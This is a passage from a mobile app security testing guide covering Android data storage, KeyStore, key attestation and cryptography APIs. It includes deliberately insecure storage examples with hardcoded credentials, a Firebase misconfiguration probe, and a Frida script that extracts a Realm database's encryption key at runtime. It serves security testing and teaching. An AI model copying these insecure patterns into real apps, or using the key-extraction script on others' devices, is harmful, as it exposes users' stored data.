SQLiteDatabase notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", MODE_PRIVATE, null);\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\");\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\");\nnotSoSecure.close();\n
Example in Kotlin:
var notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", Context.MODE_PRIVATE, null)\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\")\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\")\nnotSoSecure.close()\n
Once the activity has been called, the database file privateNotSoSecure
will be created with the provided data and stored in the clear text file /data/data/<package-name>/databases/privateNotSoSecure
.
The database's directory may contain several files besides the SQLite database:
Sensitive information should not be stored in unencrypted SQLite databases.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-databases-encrypted","title":"SQLite Databases (Encrypted)","text":"With the library SQLCipher, you can password-encrypt SQLite databases.
Example in Java:
SQLiteDatabase secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null);\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\");\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\");\nsecureDB.close();\n
Example in Kotlin:
var secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null)\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\")\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\")\nsecureDB.close()\n
Secure ways to retrieve the database key include:
Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://_firebaseProjectName_.firebaseio.com/.json
The firebaseProjectName can be retrieved from the mobile application by reverse engineering the application. Alternatively, the analysts can use Firebase Scanner, a python script that automates the task above as shown below:
python FirebaseScanner.py -p <pathOfAPKFile>\n\npython FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"The Realm Database for Java is becoming more and more popular among developers. The database and its contents can be encrypted with a key stored in the configuration file.
//the getKey() method either gets the key from the server or from a KeyStore, or is derived from a password.\nRealmConfiguration config = new RealmConfiguration.Builder()\n .encryptionKey(getKey())\n .build();\n\nRealm realm = Realm.getInstance(config);\n
Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as shared preferences, or securely in the platform's KeyStore (which is best practice).
However, if an attacker has sufficient access to the device (e.g. root access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
'use strict';\n\nfunction modulus(x, n){\n return ((x % n) + n) % n;\n}\n\nfunction bytesToHex(bytes) {\n for (var hex = [], i = 0; i < bytes.length; i++) { hex.push(((bytes[i] >>> 4) & 0xF).toString(16).toUpperCase());\n hex.push((bytes[i] & 0xF).toString(16).toUpperCase());\n }\n return hex.join(\"\");\n}\n\nfunction b2s(array) {\n var result = \"\";\n for (var i = 0; i < array.length; i++) {\n result += String.fromCharCode(modulus(array[i], 256));\n }\n return result;\n}\n\n// Main Modulus and function.\n\nif(Java.available){\n console.log(\"Java is available\");\n console.log(\"[+] Android Device.. Hooking Realm Configuration.\");\n\n Java.perform(function(){\n var RealmConfiguration = Java.use('io.realm.RealmConfiguration');\n if(RealmConfiguration){\n console.log(\"[++] Realm Configuration is available\");\n Java.choose(\"io.realm.Realm\", {\n onMatch: function(instance)\n {\n console.log(\"[==] Opened Realm Database...Obtaining the key...\")\n console.log(instance);\n console.log(instance.getPath());\n console.log(instance.getVersion());\n var encryption_key = instance.getConfiguration().getEncryptionKey();\n console.log(encryption_key);\n console.log(\"Length of the key: \" + encryption_key.length); \n console.log(\"Decryption Key:\", bytesToHex(encryption_key));\n\n }, \n onComplete: function(instance){\n RealmConfiguration.$init.overload('java.io.File', 'java.lang.String', '[B', 'long', 'io.realm.RealmMigration', 'boolean', 'io.realm.internal.OsRealmConfig$Durability', 'io.realm.internal.RealmProxyMediator', 'io.realm.rx.RxObservableFactory', 'io.realm.coroutines.FlowFactory', 'io.realm.Realm$Transaction', 'boolean', 'io.realm.CompactOnLaunchCallback', 'boolean', 'long', 'boolean', 'boolean').implementation = function(arg1)\n {\n console.log(\"[==] Realm onComplete Finished..\")\n\n }\n }\n\n });\n }\n });\n}\n
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#internal-storage","title":"Internal Storage","text":"You can save files to the device's internal storage. Files saved to internal storage are containerized by default and cannot be accessed by other apps on the device. When the user uninstalls your app, these files are removed. The following code snippets would persistently store sensitive data to internal storage.
Example for Java:
FileOutputStream fos = null;\ntry {\n fos = openFileOutput(FILENAME, Context.MODE_PRIVATE);\n fos.write(test.getBytes());\n fos.close();\n} catch (FileNotFoundException e) {\n e.printStackTrace();\n} catch (IOException e) {\n e.printStackTrace();\n}\n
Example for Kotlin:
var fos: FileOutputStream? = null\nfos = openFileOutput(\"FILENAME\", Context.MODE_PRIVATE)\nfos.write(test.toByteArray(Charsets.UTF_8))\nfos.close()\n
You should check the file mode to make sure that only the app can access the file. You can set this access with MODE_PRIVATE
. Modes such as MODE_WORLD_READABLE
(deprecated) and MODE_WORLD_WRITEABLE
(deprecated) may pose a security risk.
Search for the class FileInputStream
to find out which files are opened and read within the app.
Every Android-compatible device supports shared external storage. This storage may be removable (such as an SD card) or internal (non-removable). Files saved to external storage are world-readable. The user can modify them when USB mass storage is enabled. You can use the following code snippets to persistently store sensitive information to external storage as the contents of the file password.txt
.
Example for Java:
File file = new File (Environment.getExternalFilesDir(), \"password.txt\");\nString password = \"SecretPassword\";\nFileOutputStream fos;\n fos = new FileOutputStream(file);\n fos.write(password.getBytes());\n fos.close();\n
Example for Kotlin:
val password = \"SecretPassword\"\nval path = context.getExternalFilesDir(null)\nval file = File(path, \"password.txt\")\nfile.appendText(password)\n
The file will be created and the data will be stored in a clear text file in external storage once the activity has been called.
It's also worth knowing that files stored outside the application folder (data/data/<package-name>/
) will not be deleted when the user uninstalls the application. Finally, it's worth noting that the external storage can be used by an attacker to allow for arbitrary control of the application in some cases. For more information: see the blog post from Checkpoint.
The Android KeyStore supports relatively secure credential storage. As of Android 4.3 (API level 18), it provides public APIs for storing and using app-private keys. An app can use a public key to create a new private/public key pair for encrypting application secrets, and it can decrypt the secrets with the private key.
You can protect keys stored in the Android KeyStore with user authentication in a confirm credential flow. The user's lock screen credentials (pattern, PIN, password, or fingerprint) are used for authentication.
You can use stored keys in one of two modes:
Users are authorized to use keys for a limited period of time after authentication. In this mode, all keys can be used as soon as the user unlocks the device. You can customize the period of authorization for each key. You can use this option only if the secure lock screen is enabled. If the user disables the secure lock screen, all stored keys will become permanently invalid.
Users are authorized to use a specific cryptographic operation that is associated with one key. In this mode, users must request a separate authorization for each operation that involves the key. Currently, fingerprint authentication is the only way to request such authorization.
The level of security afforded by the Android KeyStore depends on its implementation, which depends on the device. Most modern devices offer a hardware-backed KeyStore implementation: keys are generated and used in a Trusted Execution Environment (TEE) or a Secure Element (SE), and the operating system can't access them directly. This means that the encryption keys themselves can't be easily retrieved, even from a rooted device. You can verify hardware-backed keys with Key Attestation. You can determine whether the keys are inside the secure hardware by checking the return value of the isInsideSecureHardware
method, which is part of the KeyInfo
class.
Note that the relevant KeyInfo indicates that secret keys and HMAC keys are insecurely stored on several devices despite private keys being correctly stored on the secure hardware.
The keys of a software-only implementation are encrypted with a per-user encryption master key. An attacker can access all keys stored on rooted devices that have this implementation in the folder /data/misc/keystore/
. Because the user's lock screen pin/password is used to generate the master key, the Android KeyStore is unavailable when the device is locked. For more security Android 9 (API level 28) introduces the unlockedDeviceRequired
flag. By passing true
to the setUnlockedDeviceRequired
method, the app prevents its keys stored in AndroidKeystore
from being decrypted when the device is locked, and it requires the screen to be unlocked before allowing decryption.
The hardware-backed Android KeyStore gives another layer to defense-in-depth security concept for Android. Keymaster Hardware Abstraction Layer (HAL) was introduced with Android 6 (API level 23). Applications can verify if the key is stored inside the security hardware (by checking if KeyInfo.isinsideSecureHardware
returns true
). Devices running Android 9 (API level 28) and higher can have a StrongBox Keymaster
module, an implementation of the Keymaster HAL that resides in a hardware security module which has its own CPU, secure storage, a true random number generator and a mechanism to resist package tampering. To use this feature, true
must be passed to the setIsStrongBoxBacked
method in either the KeyGenParameterSpec.Builder
class or the KeyProtection.Builder
class when generating or importing keys using AndroidKeystore
. To make sure that StrongBox is used during runtime, check that isInsideSecureHardware
returns true
and that the system does not throw StrongBoxUnavailableException
, which gets thrown if the StrongBox Keymaster isn't available for the given algorithm and key size associated with a key. Description of features on hardware-based keystore can be found on AOSP pages.
Keymaster HAL is an interface to hardware-backed components - Trusted Execution Environment (TEE) or a Secure Element (SE), which is used by Android Keystore. An example of such a hardware-backed component is Titan M.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#key-attestation","title":"Key Attestation","text":"For the applications which heavily rely on Android Keystore for business-critical operations, such as multi-factor authentication through cryptographic primitives, secure storage of sensitive data at the client-side, etc. Android provides the feature of Key Attestation, which helps to analyze the security of cryptographic material managed through Android Keystore. From Android 8.0 (API level 26), the key attestation was made mandatory for all new (Android 7.0 or higher) devices that need to have device certification for Google apps. Such devices use attestation keys signed by the Google hardware Attestation Root certificate and the same can be verified through the key attestation process.
During key attestation, we can specify the alias of a key pair and in return, get a certificate chain, which we can use to verify the properties of that key pair. If the root certificate of the chain is the Google Hardware Attestation Root certificate, and the checks related to key pair storage in hardware are made, it gives an assurance that the device supports hardware-level key attestation, and that the key is in the hardware-backed keystore that Google believes to be secure. Alternatively, if the attestation chain has any other root certificate, then Google does not make any claims about the security of the hardware.
Although the key attestation process can be implemented within the application directly, it is recommended that it should be implemented at the server-side for security reasons. The following are the high-level guidelines for the secure implementation of Key Attestation:
setAttestationChallenge
API with the challenge received from the server and should then retrieve the attestation certificate chain using the KeyStore.getCertificateChain
method.Software
, TrustedEnvironment
or StrongBox
. The client supports hardware-level key attestation if the security level is TrustedEnvironment
or StrongBox
and the attestation certificate chain contains a root certificate signed with the Google attestation root key.Note, if for any reason that process fails, it means that the key is not in security hardware. That does not mean that the key is compromised.
The typical example of Android Keystore attestation response looks like this:
{\n \"fmt\": \"android-key\",\n \"authData\": \"9569088f1ecee3232954035dbd10d7cae391305a2751b559bb8fd7cbb229bd...\",\n \"attStmt\": {\n \"alg\": -7,\n \"sig\": \"304402202ca7a8cfb6299c4a073e7e022c57082a46c657e9e53...\",\n \"x5c\": [\n \"308202ca30820270a003020102020101300a06082a8648ce3d040302308188310b30090603550406130...\",\n \"308202783082021ea00302010202021001300a06082a8648ce3d040302308198310b300906035504061...\",\n \"3082028b30820232a003020102020900a2059ed10e435b57300a06082a8648ce3d040302308198310b3...\"\n ]\n }\n}\n
In the above JSON snippet, the keys have the following meaning:
fmt
: Attestation statement format identifierauthData
: It denotes the authenticator data for the attestationalg
: The algorithm that is used for the Signaturesig
: Signaturex5c
: Attestation certificate chainNote: The sig
is generated by concatenating authData
and clientDataHash
(challenge sent by the server) and signing through the credential private key using the alg
signing algorithm. The same is verified at the server-side by using the public key in the first certificate.
For more understanding on the implementation guidelines, you can refer to Google Sample Code.
For the security analysis perspective, the analysts may perform the following checks for the secure implementation of Key Attestation:
Android 9 (API level 28) adds the ability to import keys securely into the AndroidKeystore
. First, AndroidKeystore
generates a key pair using PURPOSE_WRAP_KEY
, which should also be protected with an attestation certificate. This pair aims to protect the Keys being imported to AndroidKeystore
. The encrypted keys are generated as ASN.1-encoded message in the SecureKeyWrapper
format, which also contains a description of the ways the imported key is allowed to be used. The keys are then decrypted inside the AndroidKeystore
hardware belonging to the specific device that generated the wrapping key, so that they never appear as plaintext in the device's host memory.
Example in Java:
KeyDescription ::= SEQUENCE {\n keyFormat INTEGER,\n authorizationList AuthorizationList\n}\n\nSecureKeyWrapper ::= SEQUENCE {\n wrapperFormatVersion INTEGER,\n encryptedTransportKey OCTET_STRING,\n initializationVector OCTET_STRING,\n keyDescription KeyDescription,\n secureKey OCTET_STRING,\n tag OCTET_STRING\n}\n
The code above presents the different parameters to be set when generating the encrypted keys in the SecureKeyWrapper format. Check the Android documentation on WrappedKeyEntry
for more details.
When defining the KeyDescription AuthorizationList, the following parameters will affect the encrypted keys security:
algorithm
parameter specifies the cryptographic algorithm with which the key is usedkeySize
parameter specifies the size, in bits, of the key, measuring in the normal way for the key's algorithmdigest
parameter specifies the digest algorithms that may be used with the key to perform signing and verification operationsOlder Android versions don't include KeyStore, but they do include the KeyStore interface from JCA (Java Cryptography Architecture). You can use KeyStores that implement this interface to ensure the secrecy and integrity of keys stored with KeyStore; BouncyCastle KeyStore (BKS) is recommended. All implementations are based on the fact that files are stored on the filesystem; all files are password-protected. To create one, use the KeyStore.getInstance(\"BKS\", \"BC\") method
, where \"BKS\" is the KeyStore name (BouncyCastle Keystore) and \"BC\" is the provider (BouncyCastle). You can also use SpongyCastle as a wrapper and initialize the KeyStore as follows: KeyStore.getInstance(\"BKS\", \"SC\")
.
Be aware that not all KeyStores properly protect the keys stored in the KeyStore files.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-a-cryptographic-key-techniques","title":"Storing a Cryptographic Key: Techniques","text":"To mitigate unauthorized use of keys on the Android device, Android KeyStore lets apps specify authorized uses of their keys when generating or importing the keys. Once made, authorizations cannot be changed.
Storing a Key - from most secure to least secure:
/sdcard/
)You can use the hardware-backed Android KeyStore if the device is running Android 7.0 (API level 24) and above with available hardware component (Trusted Execution Environment (TEE) or a Secure Element (SE)). You can even verify that the keys are hardware-backed by using the guidelines provided for the secure implementation of Key Attestation. If a hardware component is not available and/or support for Android 6.0 (API level 23) and below is required, then you might want to store your keys on a remote server and make them available after authentication.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-on-the-server","title":"Storing Keys on the Server","text":"It is possible to securely store keys on a key management server, however the app needs to be online to decrypt the data. This might be a limitation for certain mobile app use cases and should be carefully thought through, as this becomes part of the architecture of the app and might highly impact usability.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#deriving-keys-from-user-input","title":"Deriving Keys from User Input","text":"Deriving a key from a user provided passphrase is a common solution (depending on which Android API level you use), but it also impacts usability, might affect the attack surface and could introduce additional weaknesses.
Each time the application needs to perform a cryptographic operation, the user's passphrase is needed. Either the user is prompted for it every time, which isn't an ideal user experience, or the passphrase is kept in memory as long as the user is authenticated. Keeping the passphrase in memory is not a best-practice, as any cryptographic material must only be kept in memory while it is being used. Zeroing out a key is often a very challenging task as explained in \"Cleaning out Key Material\".
Additionally, consider that keys derived from a passphrase have their own weaknesses. For instance, the passwords or passphrases might be reused by the user or easy to guess. Please refer to the Testing Cryptography chapter for more information.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#cleaning-out-key-material","title":"Cleaning out Key Material","text":"The key material should be cleared out from memory as soon as it is not need anymore. There are certain limitations of reliably cleaning up secret data in languages with garbage collector (Java) and immutable strings (Swift, Objective-C, Kotlin). Java Cryptography Architecture Reference Guide suggests using char[]
instead of String
for storing sensitive data, and nullify array after usage.
Note that some ciphers do not properly clean up their byte-arrays. For instance, the AES Cipher in BouncyCastle does not always clean up its latest working key, leaving some copies of the byte-array in memory. Next, BigInteger based keys (e.g. private keys) cannot be removed from the heap, nor zeroed out without additional effort. Clearing byte array can be achieved by writing a wrapper which implements Destroyable.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-using-android-keystore-api","title":"Storing Keys using Android KeyStore API","text":"A more user-friendly and recommended way is to use the Android KeyStore API system (itself or through KeyChain) to store key material. If it is possible, hardware-backed storage should be used. Otherwise, it should fallback to software implementation of Android Keystore. However, be aware that the AndroidKeyStore
API has been changed significantly throughout versions of Android. In earlier versions, the AndroidKeyStore
API only supported storing public/private key pairs (e.g., RSA). Symmetric key support has only been added since Android 6.0 (API level 23). As a result, a developer needs to handle the different Android API levels to securely store symmetric keys.
In order to securely store symmetric keys on devices running on Android 5.1 (API level 22) or lower, we need to generate a public/private key pair. We encrypt the symmetric key using the public key and store the private key in the AndroidKeyStore
. The encrypted symmetric key can be encoded using base64 and stored in the SharedPreferences
. Whenever we need the symmetric key, the application retrieves the private key from the AndroidKeyStore
and decrypts the symmetric key.
Envelope encryption, or key wrapping, is a similar approach that uses symmetric encryption to encapsulate key material. Data encryption keys (DEKs) can be encrypted with key encryption keys (KEKs) which are securely stored. Encrypted DEKs can be stored in SharedPreferences
or written to files. When required, the application reads the KEK, then decrypts the DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
Also, as the illustration of this approach, refer to the EncryptedSharedPreferences from androidx.security.crypto package.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#insecure-options-to-store-keys","title":"Insecure options to store keys","text":"A less secure way of storing encryption keys, is in the SharedPreferences of Android. When SharedPreferences are used, the file is only readable by the application that created it. However, on rooted devices, any other application with root access can read the SharedPreferences file of other apps. This is not the case for the AndroidKeyStore, since AndroidKeyStore access is managed on the kernel level, which needs considerably more work and skill to bypass without the AndroidKeyStore clearing or destroying the keys.
The last three options are to use hardcoded encryption keys in the source code, having a predictable obfuscation function or key derivation function based on stable attributes, and storing generated keys in public places like /sdcard/
. Hardcoded encryption keys are an issue, since this means every instance of the application uses the same encryption key. An attacker can reverse-engineer a local copy of the application to extract the cryptographic key, and use that key to decrypt any data which was encrypted by the application on any device.
Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device to find the key. Lastly, storing encryption keys publicly is also highly discouraged, as other applications can have permission to read the public partition and steal the keys.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#data-encryption-using-third-party-libraries","title":"Data Encryption Using Third Party Libraries","text":"There are several different open-source libraries that offer encryption capabilities specific to the Android platform.
Please keep in mind that as long as the key is not stored in the KeyStore, it is always possible to easily retrieve the key on a rooted device and then decrypt the values you are trying to protect.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keychain","title":"KeyChain","text":"The KeyChain class is used to store and retrieve system-wide private keys and their corresponding certificates (chain). The user will be prompted to set a lock screen pin or password to protect the credential storage if something is being imported into the KeyChain for the first time. Note that the KeyChain is system-wide, every application can access the materials stored in the KeyChain.
Inspect the source code to determine whether native Android mechanisms identify sensitive information. Sensitive information should be encrypted, not stored in clear text. For sensitive information that must be stored on the device, several API calls are available to protect the data via the KeyChain
class. Complete the following steps:
AndroidKeystore
, import java.security.KeyStore
, import javax.crypto.Cipher
, import java.security.SecureRandom
, and corresponding usages.store(OutputStream stream, char[] password)
function to store the KeyStore to disk with a password. Make sure that the password is provided by the user, not hard-coded.There are many legitimate reasons to create log files on a mobile device, such as keeping track of crashes, errors, and usage statistics. Log files can be stored locally when the app is offline and sent to the endpoint once the app is online. However, logging sensitive data may expose the data to attackers or malicious applications, and it might also violate user confidentiality. You can create log files in several ways. The following list includes two classes that are available for Android:
Android provides users with an auto-backup feature. The backups usually include copies of data and settings for all installed apps. Given its diverse ecosystem, Android supports many backup options:
Stock Android has built-in USB backup facilities. When USB debugging is enabled, use the adb backup
command to create full data backups and backups of an app's data directory.
Google provides a \"Back Up My Data\" feature that backs up all app data to Google's servers.
Two Backup APIs are available to app developers:
Key/Value Backup (Backup API or Android Backup Service) uploads to the Android Backup Service cloud.
Auto Backup for Apps: With Android 6.0 (API level 23) and above, Google added the \"Auto Backup for Apps feature\". This feature automatically syncs at most 25MB of app data with the user's Google Drive account.
OEMs may provide additional options. For example, HTC devices have a \"HTC Backup\" option that performs daily backups to the cloud when activated.
Apps must carefully ensure that sensitive user data doesn't end within these backups as this may allow an attacker to extract it.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#adb-backup-support","title":"ADB Backup Support","text":"Android provides an attribute called allowBackup
to back up all your application data. This attribute is set in the AndroidManifest.xml
file. If the value of this attribute is true, the device allows users to back up the application with Android Debug Bridge (ADB) via the command $ adb backup
.
To prevent the app data backup, set the android:allowBackup
attribute to false. When this attribute is unavailable, the allowBackup setting is enabled by default, and backup must be manually deactivated.
Note: If the device was encrypted, then the backup files will be encrypted as well.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"All applications on Android use memory to perform normal computational operations like any regular modern-day computer. It is of no surprise then that at times sensitive operations will be performed within process memory. For this reason, it is important that once the relevant sensitive data has been processed, it should be disposed from process memory as quickly as possible.
The investigation of an application's memory can be done from memory dumps, and from analyzing the memory in real time via a debugger.
For an overview of possible sources of data exposure, check the documentation and identify application components before you examine the source code. For example, sensitive data from a backend may be in the HTTP client, the XML parser, etc. You want all these copies to be removed from memory as soon as possible.
In addition, understanding the application's architecture and the architecture's role in the system will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without any processing. That data can be handled in an encrypted format, which prevents exposure in memory.
However, if you need to expose sensitive data in memory, you should make sure that your app is designed to expose as few data copies as possible as briefly as possible. In other words, you want the handling of sensitive data to be centralized (i.e., with as few components as possible) and based on primitive, mutable data structures.
The latter requirement gives developers direct memory access. Make sure that they use this access to overwrite the sensitive data with dummy data (typically zeroes). Examples of preferable data types include byte []
and char []
, but not String
or BigInteger
. Whenever you try to modify an immutable object like String
, you create and change a copy of the object.
Using non-primitive mutable types like StringBuffer
and StringBuilder
may be acceptable, but it's indicative and requires care. Types like StringBuffer
are used to modify content (which is what you want to do). To access such a type's value, however, you would use the toString
method, which would create an immutable copy of the data. There are several ways to use these data types without creating an immutable copy, but they require more effort than using a primitive array. Safe memory management is one benefit of using types like StringBuffer
, but this can be a two-edged sword. If you try to modify the content of one of these types and the copy exceeds the buffer capacity, the buffer size will automatically increase. The buffer content may be copied to a different location, leaving the old content without a reference use to overwrite it.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. For example, destroying a key, as shown below, doesn't remove the key from memory:
Example in Java:
SecretKey secretKey = new SecretKeySpec(\"key\".getBytes(), \"AES\");\nsecretKey.destroy();\n
Example in Kotlin:
val secretKey: SecretKey = SecretKeySpec(\"key\".toByteArray(), \"AES\")\nsecretKey.destroy()\n
Overwriting the backing byte-array from secretKey.getEncoded
doesn't remove the key either; the SecretKeySpec-based key returns a copy of the backing byte-array. See the sections below for the proper way to remove a SecretKey
from memory.
The RSA key pair is based on the BigInteger
type and therefore resides in memory after its first use outside the AndroidKeyStore
. Some ciphers (such as the AES Cipher
in BouncyCastle
) do not properly clean up their byte-arrays.
User-provided data (credentials, social security numbers, credit card information, etc.) is another type of data that may be exposed in memory. Regardless of whether you flag it as a password field, EditText
delivers content to the app via the Editable
interface. If your app doesn't provide Editable.Factory
, user-provided data will probably be exposed in memory for longer than necessary. The default Editable
implementation, the SpannableStringBuilder
, causes the same issues as Java's StringBuilder
and StringBuffer
cause (discussed above).
The features provided by third-party services can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
At certain points in time, the user will have to enter sensitive information into the application. This data may be financial information such as credit card data or user account passwords, or maybe healthcare data. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing experience at application startup and exit, so they introduced the screenshot-saving feature for use when the application is backgrounded. This feature may pose a security risk. Sensitive data may be exposed if the user deliberately screenshots the application while sensitive data is displayed. A malicious application that is running on the device and able to continuously capture the screen may also expose data. Screenshots are written to local storage, from which they may be recovered by a rogue application (if the device is rooted) or someone who has stolen the device.
For example, capturing a screenshot of a banking application may reveal information about the user's account, credit, transactions, and so on.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#app-notifications","title":"App Notifications","text":"It is important to understand that notifications should never be considered private. When a notification is handled by the Android system it is broadcasted system-wide and any application running with a NotificationListenerService can listen for these notifications to receive them in full and may handle them however it wants.
There are many known malware samples such as Joker, and Alien which abuses the NotificationListenerService
to listen for notifications on the device and then send them to attacker-controlled C2 infrastructure. Commonly this is done to listen for two-factor authentication (2FA) codes that appear as notifications on the device which are then sent to the attacker. A safer alternative for the user would be to use a 2FA application that does not generate notifications.
Furthermore there are a number of apps on the Google Play Store that provide notification logging, which logs locally any notifications on the Android system. This highlights that notifications are in no way private on Android and accessible by any other app on the device.
For this reason all notification usage should be inspected for confidential or high risk information that could be used by malicious applications.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"When users enter information in input fields, the software automatically suggests data. This feature can be very useful for messaging apps. However, the keyboard cache may disclose sensitive information when the user selects an input field that takes this type of information.
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/","title":"Android Cryptographic APIs","text":""},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#overview","title":"Overview","text":"In the chapter \"Mobile App Cryptography\", we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on Android's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices, as linked in this guide.
We can identify key components of cryptography system on Android:
Android cryptography APIs are based on the Java Cryptography Architecture (JCA). JCA separates the interfaces and implementation, making it possible to include several security providers that can implement sets of cryptographic algorithms. Most of the JCA interfaces and classes are defined in the java.security.*
and javax.crypto.*
packages. In addition, there are Android specific packages android.security.*
and android.security.keystore.*
.
KeyStore and KeyChain provide APIs for storing and using keys (behind the scene, KeyChain API uses KeyStore system). These systems allow to administer the full lifecycle of the cryptographic keys. Requirements and guidance for implementation of cryptographic key management can be found in Key Management Cheat Sheet. We can identify following phases:
Please note that storing of a key is analyzed in the chapter \"Testing Data Storage\".
These phases are managed by the Keystore/KeyChain system. However how the system works depends on how the application developer implemented it. For the analysis process you should focus on functions which are used by the application developer. You should identify and verify the following functions:
Apps that target modern API levels, went through the following changes:
Crypto
provider has dropped and the provider is deprecated. The same applies to its SHA1PRNG
for secure random.AndroidOpenSSL
, is preferred above using Bouncy Castle and it has new implementations: AlgorithmParameters:GCM
, KeyGenerator:AES
, KeyGenerator:DESEDE
, KeyGenerator:HMACMD5
, KeyGenerator:HMACSHA1
, KeyGenerator:HMACSHA224
, KeyGenerator:HMACSHA256
, KeyGenerator:HMACSHA384
, KeyGenerator:HMACSHA512
, SecretKeyFactory:DESEDE
, and Signature:NONEWITHECDSA
.IvParameterSpec.class
anymore for GCM, but use the GCMParameterSpec.class
instead.OpenSSLSocketImpl
to ConscryptFileDescriptorSocket
, and ConscryptEngineSocket
.SSLSession
with null parameters give a NullPointerException
.InvalidKeySpecException
is thrown.SocketException
.getInstance
method and you target any API below 28. If you target Android 9 (API level 28) or above, you get an error.Crypto
security provider is now removed. Calling it will result in a NoSuchProviderException
.The following list of recommendations should be considered during app examination:
SHA1PRNG
as they are deprecated.Android relies on the java.security.Provider
class to implement Java Security services. These providers are crucial to ensure secure network communications and secure other functionalities which depend on cryptography.
The list of security providers included in Android varies between versions of Android and the OEM-specific builds. Some security provider implementations in older versions are now known to be less secure or vulnerable. Thus, Android applications should not only choose the correct algorithms and provide a good configuration, in some cases they should also pay attention to the strength of the implementations in the legacy security providers.
You can list the set of existing security providers using following code:
StringBuilder builder = new StringBuilder();\nfor (Provider provider : Security.getProviders()) {\n builder.append(\"provider: \")\n .append(provider.getName())\n .append(\" \")\n .append(provider.getVersion())\n .append(\"(\")\n .append(provider.getInfo())\n .append(\")\\n\");\n}\nString providers = builder.toString();\n//now display the string on the screen or in the logs for debugging.\n
This is the output for Android 9 (API level 28) running in an emulator with Google Play APIs:
provider: AndroidNSSP 1.0(Android Network Security Policy Provider)\nprovider: AndroidOpenSSL 1.0(Android's OpenSSL-backed security provider)\nprovider: CertPathProvider 1.0(Provider of CertPathBuilder and CertPathVerifier)\nprovider: AndroidKeyStoreBCWorkaround 1.0(Android KeyStore security provider to work around Bouncy Castle)\nprovider: BC 1.57(BouncyCastle Security Provider v1.57)\nprovider: HarmonyJSSE 1.0(Harmony JSSE Provider)\nprovider: AndroidKeyStore 1.0(Android KeyStore security provider)\n
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#updating-security-provider","title":"Updating security provider","text":"Keeping up-to-date and patched component is one of security principles. The same applies to provider
. Application should check if used security provider is up-to-date and if not, update it.
For some applications that support older versions of Android (e.g.: only used versions lower than Android 7.0 (API level 24)), bundling an up-to-date library may be the only option. Conscrypt library is a good choice in this situation to keep the cryptography consistent across the different API levels and avoid having to import Bouncy Castle which is a heavier library.
Conscrypt for Android can be imported this way:
dependencies {\n implementation 'org.conscrypt:conscrypt-android:last_version'\n}\n
Next, the provider must be registered by calling:
Security.addProvider(Conscrypt.newProvider())\n
